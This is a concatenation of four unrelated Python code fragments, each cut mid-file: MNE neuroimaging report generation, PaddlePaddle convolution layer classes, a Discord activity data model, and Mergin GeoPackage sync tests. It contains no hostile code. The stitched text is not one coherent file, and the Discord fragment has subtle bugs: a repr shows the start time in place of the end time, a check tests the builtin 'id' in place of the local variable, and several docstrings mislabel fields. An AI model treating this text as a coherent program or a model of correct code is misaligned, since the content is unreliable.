bgcolor=(0., 0., 0.), size=(1000, 1000))
for key, val in (
('info', sss_info),
('subjects_dir', subjects_dir), ('bem', bem),
('dig', True), ('coord_frame', coord_frame),
('show_axes', True), ('fig', fig),
('trans', trans), ('src', src)):
kwargs[key] = kwargs.get(key, val)
try_surfs = [('head-dense', 'inner_skull'),
('head', 'inner_skull'),
'head',
'inner_skull']
ex = None
for surf in try_surfs:
try:
mne.viz.plot_alignment(surfaces=surf, **kwargs)
except Exception as exc:
ex = exc
else:
break
else:
print(
'\nCould not plot any surface for alignment '
f'for {subj}:\n{try_surfs}\nGot error:\n')
raise ex from None
del ex
try:
fig.scene.parallel_projection = True
except AttributeError:
pass
view = list()
for ai, angle in enumerate([180, 90, 0]):
mne.viz.set_3d_view(
fig, angle, 90, focalpoint=(0., 0., 0.),
distance=0.6)
try:
screenshot = fig.plotter.screenshot()
except AttributeError:
from mayavi import mlab
screenshot = mlab.screenshot(fig)
view.append(screenshot)
try:
fig.plotter.close()
except AttributeError:
from mayavi import mlab
mlab.close(fig)
view = trim_bg(np.concatenate(view, axis=1), 0)
report.add_figs_to_section(view, captions, section)
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
#
# Drop log
#
section = 'Drop log'
if p.report_params.get('drop_log', True) and has_epochs:
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
epo = read_epochs(epochs_fname)
figs = [epo.plot_drop_log(subject=subj, show=False)]
captions = [repr(epo)]
report.add_figs_to_section(figs, captions, section,
image_format='svg')
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
#
# BEM
#
section = 'BEM'
if p.report_params.get('bem', True) and has_fwd:
caption = '%s: %s' % (section, struc)
bem, src, trans, _ = _get_bem_src_trans(
p, raw.info, subj, struc)
if not bem['is_sphere']:
subjects_dir = mne.utils.get_subjects_dir(
p.subjects_dir, raise_error=True)
mri_fname = op.join(subjects_dir, struc, 'mri', 'T1.mgz')
if not op.isfile(mri_fname):
warnings.warn(
'Could not find MRI:\n%s\nIf using surrogate '
'subjects, use '
'params.report_params["bem"] = False to avoid '
'this warning', stacklevel=2)
else:
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
with use_log_level('error'):
report.add_bem_to_section(
struc, caption, section, decim=10, n_jobs=1,
subjects_dir=subjects_dir)
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped (sphere)' % section)
else:
print(' %s skipped' % section)
#
# Covariance
#
section = 'Covariance'
if p.report_params.get('covariance', True):
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
cov_name = p.report_params.get('covariance', None)
cov_name = _get_cov_name(p, subj, cov_name)
if cov_name is None:
print(' Missing covariance: %s'
% op.basename(cov_name), end='')
else:
noise_cov = mne.read_cov(cov_name)
info = raw_pca.info
figs = plot_cov(
noise_cov, info, show=False, verbose='error')
captions = ['%s: %s' % (section, kind)
for kind in ('images', 'SVDs')]
report.add_figs_to_section(
figs, captions, section=section, image_format='png')
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
#
# Whitening
#
section = 'Whitening'
if p.report_params.get('whitening', False):
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
whitenings = p.report_params['whitening']
if not isinstance(whitenings, (list, tuple)):
whitenings = [whitenings]
for whitening in whitenings:
assert isinstance(whitening, dict)
analysis = whitening['analysis']
name = whitening['name']
cov_name = _get_cov_name(p, subj, whitening.get('cov'))
# Load the inverse
fname_evoked = op.join(inv_dir, '%s_%d%s_%s_%s-ave.fif'
% (analysis, p.lp_cut, p.inv_tag,
p.eq_tag, subj))
if cov_name is None:
if whitening.get('cov') is not None:
extra = ': %s' % op.basename(whitening['cov'])
else:
extra = ''
print(' Missing cov%s' % extra, end='')
elif not op.isfile(fname_evoked):
print(' Missing evoked: %s'
% op.basename(fname_evoked), end='')
else:
noise_cov = mne.read_cov(cov_name)
# too messy to plot separately, just plot the main one
all_evoked = _get_std_even_odd(fname_evoked, name)
figs = list()
n_s = sum(k in all_evoked[0] for k in ('meg', 'eeg'))
n_e = len(all_evoked)
n_row = n_s * n_e + 1
figs, axes = plt.subplots(
n_row, 1, figsize=(7, 3 * n_row))
captions = [
'%s: %s["%s"] (N=%s)'
% (section, analysis, all_evoked[0].comment,
'/'.join(str(evo.nave) for evo in all_evoked))]
for ei, evo in enumerate(all_evoked):
if ei > 0:
evo.data *= SQRT_2
sl = slice(ei, n_e * n_s, n_e)
these_axes = list(axes[sl]) + [axes[-1]]
evo.plot_white(
noise_cov, verbose='error', axes=these_axes)
for ax in these_axes[:-1]:
n_text = 'N=%d' % (evo.nave,)
if ei != 0:
title = f'{n_text} {SQ2STR}'
else:
title = f'{ax.get_title()[:-1]}; {n_text})'
ax.set(title=title)
xlim = all_evoked[0].times[[0, -1]]
del ei, all_evoked
# joint ylims
for si in range(n_s + 1):
if si == n_s:
ax = axes[-1:]
else:
ax = axes[si * n_e:(si + 1) * n_e]
this_max = max(np.max(np.abs(line.get_ydata()))
for a in ax
for line in a.lines)
if si == n_s:
ax[0].set(ylim=[0, this_max], xlim=xlim)
else:
for a in ax:
a.set(ylim=[-this_max, this_max],
xlim=xlim)
del si
n_real = 0
hs, labels = [], []
for line in axes[-1].lines:
if line.get_linestyle() == '-':
if n_real < n_s:
line.set(linewidth=2)
hs, labels = [line], [line.get_label()]
else:
line.set(alpha=0.5, linewidth=1)
n_real += 1
assert n_real == n_e * n_s
axes[-1].legend(hs, labels)
if n_e > 1:
axes[-1].set_title(
f'{axes[-1].get_title()} (halves {SQ2STR})')
axes[-1]
figs.tight_layout()
report.add_figs_to_section(
figs, captions, section=section,
image_format='png')
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
| |
ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
data_format(str, optional): Data format that specifies the layout of input.
It can be "NCHW" or "NHWC". Default: "NCHW".
Attribute:
**weight** (Parameter): the learnable weights of filters of this layer.
**bias** (Parameter or None): the learnable bias of this layer.
Shape:
- x: :math:`(N, C_{in}, H_{in}, W_{in})`
- output: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H^\prime_{out} &= (H_{in} - 1) * strides[0] - 2 * paddings[0] + dilations[0] * (kernel\_size[0] - 1) + 1
W^\prime_{out} &= (W_{in} - 1) * strides[1] - 2 * paddings[1] + dilations[1] * (kernel\_size[1] - 1) + 1
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[0] )
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[1] )
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
paddle.disable_static()
x_var = paddle.uniform((2, 4, 8, 8), dtype='float32', min=-1., max=1.)
conv = nn.Conv2DTranspose(4, 6, (3, 3))
y_var = conv(x_var)
y_np = y_var.numpy()
print(y_np.shape)
# (2, 6, 10, 10)
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
output_padding=0,
dilation=1,
groups=1,
weight_attr=None,
bias_attr=None,
data_format="NCHW"):
super(Conv2DTranspose, self).__init__(
in_channels,
out_channels,
kernel_size,
True,
2,
stride=stride,
padding=padding,
dilation=dilation,
output_padding=output_padding,
groups=groups,
weight_attr=weight_attr,
bias_attr=bias_attr,
data_format=data_format)
def forward(self, x, output_size=None):
if output_size is None:
output_padding = self.output_padding
else:
output_padding = 0
out = F.conv2d_transpose(
x,
self.weight,
bias=self.bias,
padding=self._padding,
output_padding=output_padding,
stride=self._stride,
dilation=self._dilation,
groups=self._groups,
output_size=output_size,
data_format=self._data_format)
return out
class Conv3D(_ConvNd):
r"""
**Convlution3d Layer**
The convolution3d layer calculates the output based on the input, filter
and strides, paddings, dilations, groups parameters. Input(Input) and
Output(Output) are multidimensional tensors with a shape of
:math:`[N, C, D, H, W]` . Where N is batch size, C is the number of
channels, D is the depth of the feature, H is the height of the feature,
and W is the width of the feature. Convlution3D is similar with Convlution2D
but adds one dimension(depth). If bias attribution and activation type are
provided, bias is added to the output of the convolution, and the
corresponding activation function is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
In the above equation:
* :math:`X`: Input value, a tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a tensor with MCDHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Parameters:
in_channels(int): The number of input channels in the input image.
out_channels(int): The number of output channels produced by the convolution.
kernel_size(int|list|tuple, optional): The size of the convolving kernel.
stride(int|list|tuple, optional): The stride size. If stride is a tuple, it must
contain three integers, (stride_D, stride_H, stride_W). Otherwise, the
stride_D = stride_H = stride_W = stride. The default value is 1.
padding(int|str|tuple|list, optional): The padding size. Padding coule be in one of the following forms.
1. a string in ['valid', 'same'].
2. an int, which means each spartial dimension(depth, height, width) is zero paded by size of `padding`
3. a list[int] or tuple[int] whose length is the number of spartial dimensions, which contains the amount of padding on each side for each spartial dimension. It has the form [pad_d1, pad_d2, ...].
4. a list[int] or tuple[int] whose length is 2 * number of spartial dimensions. It has the form [pad_before, pad_after, pad_before, pad_after, ...] for all spartial dimensions.
5. a list or tuple of pairs of ints. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension are also included. Each pair of integers correspond to the amount of padding for a dimension of the input. Padding in batch dimension and channel dimension should be [0, 0] or (0, 0).
The default value is 0.
dilation(int|list|tuple, optional): The dilation size. If dilation is a tuple, it must
contain three integers, (dilation_D, dilation_H, dilation_W). Otherwise, the
dilation_D = dilation_H = dilation_W = dilation. The default value is 1.
groups(int, optional): The groups number of the Conv3D Layer. According to grouped
convolution in <NAME> Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. The default value is 1.
padding_mode(str, optional): ``'zeros'``, ``'reflect'``, ``'replicate'`` or ``'circular'``. Default: ``'zeros'``.
weight_attr(ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv3d. If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as param_attr. If it is set to None, the parameter
is initialized with :math:`Normal(0.0, std)`, and the :math:`std` is
:math:`(\frac{2.0 }{filter\_elem\_num})^{0.5}`. The default value is None.
bias_attr(ParamAttr|bool, optional): The parameter attribute for the bias of conv3d.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. The default value is None.
data_format(str, optional): Data format that specifies the layout of input.
It can be "NCDHW" or "NDHWC". Default: "NCDHW".
Attribute:
**weight** (Parameter): the learnable weights of filters of this layer.
**bias** (Parameter): the learnable bias of this layer.
Shape:
- x: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
- output: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D_{out}&= \frac{(D_{in} + 2 * paddings[0] - (dilations[0] * (kernel\_size[0] - 1) + 1))}{strides[0]} + 1
H_{out}&= \frac{(H_{in} + 2 * paddings[1] - (dilations[1] * (kernel\_size[1] - 1) + 1))}{strides[1]} + 1
W_{out}&= \frac{(W_{in} + 2 * paddings[2] - (dilations[2] * (kernel\_size[2] - 1) + 1))}{strides[2]} + 1
Raises:
ValueError: If the shapes of input, filter_size, stride, padding and
groups mismatch.
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
paddle.disable_static()
x_var = paddle.uniform((2, 4, 8, 8, 8), dtype='float32', min=-1., max=1.)
conv = nn.Conv3D(4, 6, (3, 3, 3))
y_var = conv(x_var)
y_np = y_var.numpy()
print(y_np.shape)
# (2, 6, 6, 6, 6)
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
padding_mode='zeros',
weight_attr=None,
bias_attr=None,
data_format="NCDHW"):
super(Conv3D, self).__init__(
in_channels,
out_channels,
kernel_size,
False,
3,
stride=stride,
padding=padding,
padding_mode=padding_mode,
dilation=dilation,
groups=groups,
weight_attr=weight_attr,
bias_attr=bias_attr,
data_format=data_format)
def forward(self, x):
if self._padding_mode != 'zeros':
x = F.pad(x,
self._reversed_padding_repeated_twice,
mode=self._padding_mode,
data_format=self._data_format)
out = F.conv._conv_nd(
x,
self.weight,
bias=self.bias,
stride=self._stride,
padding=self._updated_padding,
padding_algorithm=self._padding_algorithm,
dilation=self._dilation,
groups=self._groups,
data_format=self._data_format,
channel_dim=self._channel_dim,
op_type=self._op_type,
use_cudnn=self._use_cudnn)
return out
class Conv3DTranspose(_ConvNd):
r"""
**Convlution3D transpose layer**
The convolution3D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCDHW format. Where N is batch size, C is the number of channels,
D is the depth of the feature, H is the height of the feature, and W
is the width of the feature. Parameters(dilations, strides, paddings) are
two elements. These two elements represent height and width, respectively.
The details of convolution transpose layer, please refer to the following
explanation and references `therein <http://www.matthewzeiler.com/wp-content/uploads/2017/07/cvpr2010.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
In the above equation:
* :math:`X`: Input value, a tensor with NCDHW format.
* :math:`W`: Filter value, a tensor with MCDHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
**Note**:
The conv3d_transpose can be seen as the backward of the conv3d. For conv3d,
when stride > 1, conv3d maps multiple input shape to the same output shape, | |
__all__ = (
'ActivityAssets',
'ActivityBase',
'ActivityParty',
'ActivitySecrets',
'ActivityTimestamps',
'ACTIVITY_TYPES',
)
from datetime import datetime
from ..utils import DISCORD_EPOCH_START
from ..color import Color
from . import activity_types as ACTIVITY_TYPES
DEFAULT_CUSTOM_ID = 'UNKNOWN'
CUSTOM_IDS = {
ACTIVITY_TYPES.spotify: 'spotify:1',
ACTIVITY_TYPES.custom: 'custom',
}
ACTIVITY_TYPE_NAMES = {
ACTIVITY_TYPES.game: 'game',
ACTIVITY_TYPES.stream: 'stream',
ACTIVITY_TYPES.spotify: 'spotify',
ACTIVITY_TYPES.watching: 'watching',
ACTIVITY_TYPES.custom: 'custom',
ACTIVITY_TYPES.competing: 'competing',
}
class ActivityTimestamps:
"""
Represents an activity's timestamp field.
Attributes
----------
end : `int`
The time when the activity ends as Unix time in milliseconds. Defaults to `0`.
start : `int`
The time when the activity starts as Unix time in milliseconds. Defaults to `0`.
"""
__slots__ = (
'end',
'start',
)
def __init__(self, timestamps_data):
"""
Creates a new activity timestamp object from the given data.
Parameters
----------
timestamps_data : `dict` of (`str`, `Any`) items
Activity timestamp data.
"""
self.start = timestamps_data.get('start', 0)
self.end = timestamps_data.get('end', 0)
def __repr__(self):
"""Returns the activity timestamp's representation."""
repr_parts = [
'<',
self.__class__.__name__,
]
start = self.start
if start:
repr_parts.append(' start=')
repr_parts.append(repr(start))
field_added = True
else:
field_added = False
end = self.end
if end:
if field_added:
repr_parts.append(',')
repr_parts.append(' end=')
repr_parts.append(repr(start))
repr_parts.append('>')
return ''.join(repr_parts)
def __eq__(self, other):
"""Returns whether the two activity timestamps are equal."""
if type(self) is not type(other):
return NotImplemented
if self.start != other.start:
return False
if self.end != other.end:
return False
return True
def to_data(self):
"""
Serializes the activity timestamp.
Returns
-------
timestamps_data : `dict` of (`str`, `Any`) items
"""
timestamps_data = {}
start = self.start
if start:
timestamps_data['start'] = start
end = self.end
if end:
timestamps_data['end'] = end
return timestamps_data
class ActivityAssets:
"""
Represents a discord activity asset.
Attributes
----------
image_large : `None` or `str`
The id of the activity's large asset to display. Defaults to `None`.
image_small : `None` or `str`
The id of the activity's small asset to display. Defaults to `None`.
text_large : `None` or `str`
The hover text of the large asset. Defaults to `None`.
text_small : `None` or `str`
The hover text of the small asset. Defaults to `None`.
"""
__slots__ = (
'image_large',
'image_small',
'text_large',
'text_small',
)
def __init__(self, assets_data):
"""
Creates a new activity asset object from the given data.
Parameters
----------
assets_data : `dict` of (`str`, `Any`) items
Activity asset data.
"""
self.image_large = assets_data.get('large_image', None)
self.image_small = assets_data.get('small_image', None)
self.text_large = assets_data.get('large_text', None)
self.text_small = assets_data.get('small_text', None)
def __repr__(self):
"""Returns the activity asset's representation."""
repr_parts = [
'<',
self.__class__.__name__,
]
image_large = self.image_large
if image_large is not None:
repr_parts.append(' image_large=')
repr_parts.append(repr(image_large))
field_added = True
else:
field_added = False
image_small = self.image_small
if image_small is not None:
if field_added:
repr_parts.append(',')
else:
field_added = True
repr_parts.append(' image_small=')
repr_parts.append(repr(image_small))
text_large = self.text_large
if text_large is not None:
if field_added:
repr_parts.append(',')
else:
field_added = True
repr_parts.append(' text_large=')
repr_parts.append(repr(text_large))
text_small = self.text_small
if text_small is not None:
if field_added:
repr_parts.append(',')
repr_parts.append(' text_small=')
repr_parts.append(repr(text_small))
repr_parts.append('>')
return ''.join(repr_parts)
def __eq__(self, other):
"""Returns whether the two activity assets are equal."""
if type(self) is not type(other):
return NotImplemented
if self.image_large != other.image_large:
return False
if self.image_small != other.image_small:
return False
if self.text_large != other.text_large:
return False
if self.text_small != other.text_small:
return False
return True
def to_data(self):
"""
Serializes the activity asset.
Returns
-------
timestamp_data : `dict` of (`str`, `Any`) items
"""
assets_data = {}
image_large = self.image_large
if image_large is not None:
assets_data['large_image'] = image_large
image_small = self.image_small
if image_small is not None:
assets_data['small_image'] = image_small
text_large = self.text_large
if text_large is not None:
assets_data['large_text'] = text_large
text_small = self.text_small
if text_small is not None:
assets_data['small_text'] = text_small
return assets_data
class ActivityParty:
"""
Represents a discord activity party.
Attributes
----------
id : `None` or `str`
The party's id, which in the player is. Defaults to `None`.
size : `int`
The party's maximal size, which in the player is. Defaults to `0`.
max : `int`
The party's actual size, which in the player is. Defaults to `0`.
"""
__slots__ = (
'id',
'size',
'max',
)
def __init__(self, party_data):
"""
Creates a new activity party object from the given data.
Parameters
----------
party_data : `dict` of (`str`, `Any`) items
Activity party data.
"""
self.id = party_data.get('id', None)
try:
size, max_ = party_data['size']
except KeyError:
size = 0
max_ = 0
self.size = size
self.max = max_
def __repr__(self):
"""Returns the activity party's representation."""
repr_parts = [
'<',
self.__class__.__name__,
]
id_ = self.id
if id is not None:
repr_parts.append(' id_=')
repr_parts.append(repr(id_))
field_added = True
else:
field_added = False
size = self.size
max_ = self.max
if size or max_:
if field_added:
repr_parts.append(',')
repr_parts.append(' size=')
repr_parts.append(repr(size))
repr_parts.append(', max=')
repr_parts.append(repr(max_))
repr_parts.append('>')
return ''.join(repr_parts)
def __eq__(self, other):
"""Returns whether the two activity parties are equal."""
if type(self) is not type(other):
return NotImplemented
if self.id != other.id:
return False
if self.size != other.size:
return False
if self.max != other.max:
return False
return True
def to_data(self):
"""
Serializes the activity party.
Returns
-------
timestamp_data : `dict` of (`str`, `Any`) items
"""
party_data = {}
id_ = self.id
if id_ is not None:
party_data['id'] = id_
size = self.size
max_ = self.max
if size or max_:
party_data['size'] = [size, max_]
return party_data
class ActivitySecrets:
"""
Represents and activity secret.
Attributes
----------
join : `None` or `str`
Unique hash given for the match context. Defaults to `None`.
match : `None` or `str`
Unique hash for spectate button. Defaults to `None`.
spectate : `None` or `str`
Unique hash for chat invites and ask to join. Defaults to `None`.
"""
__slots__ = (
'join',
'match',
'spectate',
)
def __init__(self, secrets_data):
"""
Creates a new activity secret object from the given data.
Parameters
----------
secrets_data : `dict` of (`str`, `Any`) items
Activity secret data.
"""
self.join = secrets_data.get('join', None)
self.spectate = secrets_data.get('spectate', None)
self.match = secrets_data.get('match', None)
def __repr__(self):
"""Returns the activity secret's representation."""
repr_parts = [
'<',
self.__class__.__name__,
]
join = self.join
if join is not None:
repr_parts.append(' join=')
repr_parts.append(repr(join))
field_added = True
else:
field_added = False
spectate = self.spectate
if spectate is not None:
if field_added:
repr_parts.append(',')
else:
field_added = True
repr_parts.append(' spectate=')
repr_parts.append(repr(spectate))
match = self.match
if match is not None:
if field_added:
repr_parts.append(',')
repr_parts.append(' match=')
repr_parts.append(repr(match))
repr_parts.append('>')
return ''.join(repr_parts)
def __eq__(self, other):
"""Returns whether the two activity secrets are equal."""
if type(self) is not type(other):
return NotImplemented
if self.join != other.join:
return False
if self.spectate != other.spectate:
return False
if self.match != other.match:
return False
return True
def to_data(self):
"""
Serializes the activity secret.
Returns
-------
timestamp_data : `dict` of (`str`, `Any`) items
"""
secrets_data = {}
join = self.join
if join is not None:
secrets_data['join'] = join
spectate = self.spectate
if spectate is not None:
secrets_data['spectate'] = spectate
match = self.match
if match is not None:
secrets_data['match'] = match
return secrets_data
class ActivityBase:
"""
Base class for activities.
Class Attributes
----------------
created : `int` = `0`
When the activity was created as Unix time in milliseconds.
name : `str` = `'Unknown'`
The activity's name. Subclasses might overwrite it as member descriptor.
id : `int` = `0`
The activity's id. Subclasses might overwrite it as member descriptor.
type : `int` = `127`
The activity's type value.
"""
name = 'Unknown'
id = 0
type = 127
created = 0
__slots__ = ()
def __new__(cls, data):
"""
Creates a new activity. Neither ``ActivityBase`` or it's subclass: ``ActivityUnknown`` cannot be instanced and
raises `RuntimeError`.
Parameters
----------
data : `dict` of (`str`, `Any`) items
Activity data received from Discord.
Raises
------
RuntimeError
"""
raise RuntimeError(f'{cls.__name__} cannot be instanced.')
def __str__(self):
"""Returns the activity's name."""
return self.name
def __repr__(self):
"""Returns the activity's representation."""
return f'<{self.__class__.__name__} name={self.name!r}>'
def __hash__(self):
"""Returns the activity's hash value."""
return self.id
def __eq__(self, other):
"""
Returns whether the two activities are equal.
Subclasses should overwrite it.
"""
return NotImplemented
@property
def color(self):
"""
Returns the activity's color.
Subclasses should overwrite it.
Returns
-------
color : ``Color``
"""
return Color()
@property
def discord_side_id(self):
"""
Returns the activity's Discord side id. If the activity implements id returns that, else returns it's
`CUSTOM_ID` class attribute.
| |
This simulates another app (e.g. QGIS) having a connection open, potentially
with some active reader/writer.
Note: we use a subprocess here instead of just using sqlite3 module from python
because pygeodiff and python's sqlite3 module have their own sqlite libraries,
and this does not work well when they are used in a single process. But if we
use another process, things are fine. This is a limitation of how we package
pygeodiff currently.
"""
def __init__(self, filename):
self.proc = subprocess.Popen(
['python3', os.path.join(os.path.dirname(__file__), 'sqlite_con.py'), filename],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
def run(self, cmd):
self.proc.stdin.write(cmd.encode()+b'\n')
self.proc.stdin.flush()
def close(self):
out,err = self.proc.communicate(b'stop\n')
if self.proc.returncode != 0:
raise ValueError("subprocess error:\n" + err.decode('utf-8'))
def test_push_gpkg_schema_change(mc):
""" Test that changes in GPKG get picked up if there were recent changes to it by another
client and at the same time geodiff fails to find changes (a new table is added)
"""
test_project = 'test_push_gpkg_schema_change'
project = API_USER + '/' + test_project
project_dir = os.path.join(TMP_DIR, test_project)
test_gpkg = os.path.join(project_dir, 'test.gpkg')
test_gpkg_basefile = os.path.join(project_dir, '.mergin', 'test.gpkg')
project_dir_verify = os.path.join(TMP_DIR, test_project + '_verify')
test_gpkg_verify = os.path.join(project_dir_verify, 'test.gpkg')
cleanup(mc, project, [project_dir, project_dir_verify])
# create remote project
os.makedirs(project_dir)
shutil.copy(os.path.join(TEST_DATA_DIR, 'base.gpkg'), test_gpkg)
#shutil.copytree(TEST_DATA_DIR, project_dir)
mc.create_project_and_push(test_project, project_dir)
mp = MerginProject(project_dir)
mp.log.info(' // create changeset')
mp.geodiff.create_changeset(mp.fpath('test.gpkg'), mp.fpath_meta('test.gpkg'), mp.fpath_meta('diff-0'))
mp.log.info(' // use wal')
_use_wal(test_gpkg)
mp.log.info(' // make changes to DB')
# open a connection and keep it open (qgis does this with a pool of connections too)
acon2 = AnotherSqliteConn(test_gpkg)
acon2.run('select count(*) from simple;')
# add a new table to ensure that geodiff will fail due to unsupported change
# (this simulates an independent reader/writer like GDAL)
_create_test_table(test_gpkg)
_check_test_table(test_gpkg)
with pytest.raises(sqlite3.OperationalError):
_check_test_table(test_gpkg_basefile)
mp.log.info(' // create changeset (2)')
# why already here there is wal recovery - it could be because of two sqlite libs linked in one executable
# INDEED THAT WAS THE PROBLEM, now running geodiff 1.0 with shared sqlite lib seems to work fine.
with pytest.raises(pygeodiff.geodifflib.GeoDiffLibError):
mp.geodiff.create_changeset(mp.fpath('test.gpkg'), mp.fpath_meta('test.gpkg'), mp.fpath_meta('diff-1'))
_check_test_table(test_gpkg)
with pytest.raises(sqlite3.OperationalError):
_check_test_table(test_gpkg_basefile)
mp.log.info(' // push project')
# push pending changes (it should include addition of the new table)
# at this point we still have an open sqlite connection to the GPKG, so checkpointing will not work correctly)
mc.push_project(project_dir)
# WITH TWO SQLITE copies: fails here (sqlite3.OperationalError: disk I/O error) + in geodiff log: SQLITE3: (283)recovered N frames from WAL file
_check_test_table(test_gpkg)
# OLD: fails here when con2 is still alive: checkpointing fails and basefile has incorrect value
_check_test_table(test_gpkg_basefile)
# download the project to a new directory and verify the change was pushed correctly
mc.download_project(project, project_dir_verify)
# OLD: fails here
_check_test_table(test_gpkg_verify)
acon2.close()
@pytest.mark.parametrize("extra_connection", [False, True])
def test_rebase_local_schema_change(mc, extra_connection):
"""
Checks whether a pull with failed rebase (due to local DB schema change) is handled correctly,
i.e. a conflict file is created with the content of the local changes.
"""
test_project = 'test_rebase_local_schema_change'
if extra_connection:
test_project += '_extra_conn'
project = API_USER + '/' + test_project
project_dir = os.path.join(TMP_DIR, test_project) # primary project dir
project_dir_2 = os.path.join(TMP_DIR, test_project+'_2') # concurrent project dir
test_gpkg = os.path.join(project_dir, 'test.gpkg')
test_gpkg_basefile = os.path.join(project_dir, '.mergin', 'test.gpkg')
test_gpkg_conflict = conflicted_copy_file_name(test_gpkg, API_USER, 1)
cleanup(mc, project, [project_dir, project_dir_2])
os.makedirs(project_dir)
shutil.copy(os.path.join(TEST_DATA_DIR, 'base.gpkg'), test_gpkg)
_use_wal(test_gpkg) # make sure we use WAL, that's the more common and more difficult scenario
mc.create_project_and_push(test_project, project_dir)
if extra_connection:
# open a connection and keep it open (qgis does this with a pool of connections too)
con_extra = sqlite3.connect(test_gpkg)
cursor_extra = con_extra.cursor()
cursor_extra.execute('select count(*) from simple;')
# Download project to the concurrent dir + add a feature + push a new version
mc.download_project(project, project_dir_2) # download project to concurrent dir
mp_2 = MerginProject(project_dir_2)
shutil.copy(os.path.join(TEST_DATA_DIR, 'inserted_1_A.gpkg'), mp_2.fpath('test.gpkg'))
mc.push_project(project_dir_2)
# Change schema in the primary project dir
_create_test_table(test_gpkg)
pull_changes, push_changes, _ = mc.project_status(project_dir)
assert _is_file_updated('test.gpkg', pull_changes)
assert _is_file_updated('test.gpkg', push_changes)
assert not os.path.exists(test_gpkg_conflict)
mc.pull_project(project_dir)
assert os.path.exists(test_gpkg_conflict)
# check the results after pull:
# - conflict copy should contain the new table
# - local file + basefile should not contain the new table
_check_test_table(test_gpkg_conflict)
with pytest.raises(sqlite3.OperationalError):
_check_test_table(test_gpkg_basefile)
with pytest.raises(sqlite3.OperationalError):
_check_test_table(test_gpkg)
# check that the local file + basefile contain the new row, and the conflict copy doesn't
assert _get_table_row_count(test_gpkg, 'simple') == 4
assert _get_table_row_count(test_gpkg_basefile, 'simple') == 4
assert _get_table_row_count(test_gpkg_conflict, 'simple') == 3
@pytest.mark.parametrize("extra_connection", [False, True])
def test_rebase_remote_schema_change(mc, extra_connection):
"""
Checks whether a pull with failed rebase (due to remote DB schema change) is handled correctly,
i.e. a conflict file is created with the content of the local changes.
"""
test_project = 'test_rebase_remote_schema_change'
if extra_connection:
test_project += '_extra_conn'
project = API_USER + '/' + test_project
project_dir = os.path.join(TMP_DIR, test_project) # primary project dir
project_dir_2 = os.path.join(TMP_DIR, test_project+'_2') # concurrent project dir
test_gpkg = os.path.join(project_dir, 'test.gpkg')
test_gpkg_2 = os.path.join(project_dir_2, 'test.gpkg')
test_gpkg_basefile = os.path.join(project_dir, '.mergin', 'test.gpkg')
test_gpkg_conflict = conflicted_copy_file_name(test_gpkg, API_USER, 1)
cleanup(mc, project, [project_dir, project_dir_2])
os.makedirs(project_dir)
shutil.copy(os.path.join(TEST_DATA_DIR, 'base.gpkg'), test_gpkg)
_use_wal(test_gpkg) # make sure we use WAL, that's the more common and more difficult scenario
mc.create_project_and_push(test_project, project_dir)
# Download project to the concurrent dir + change DB schema + push a new version
mc.download_project(project, project_dir_2)
_create_test_table(test_gpkg_2)
mc.push_project(project_dir_2)
# do changes in the local DB (added a row)
shutil.copy(os.path.join(TEST_DATA_DIR, 'inserted_1_A.gpkg'), test_gpkg)
_use_wal(test_gpkg) # make sure we use WAL
if extra_connection:
# open a connection and keep it open (qgis does this with a pool of connections too)
con_extra = sqlite3.connect(test_gpkg)
cursor_extra = con_extra.cursor()
cursor_extra.execute('select count(*) from simple;')
pull_changes, push_changes, _ = mc.project_status(project_dir)
assert _is_file_updated('test.gpkg', pull_changes)
assert _is_file_updated('test.gpkg', push_changes)
assert not os.path.exists(test_gpkg_conflict)
mc.pull_project(project_dir)
assert os.path.exists(test_gpkg_conflict)
# check the results after pull:
# - conflict copy should not contain the new table
# - local file + basefile should contain the new table
_check_test_table(test_gpkg)
_check_test_table(test_gpkg_basefile)
with pytest.raises(sqlite3.OperationalError):
_check_test_table(test_gpkg_conflict)
# check that the local file + basefile don't contain the new row, and the conflict copy does
assert _get_table_row_count(test_gpkg, 'simple') == 3
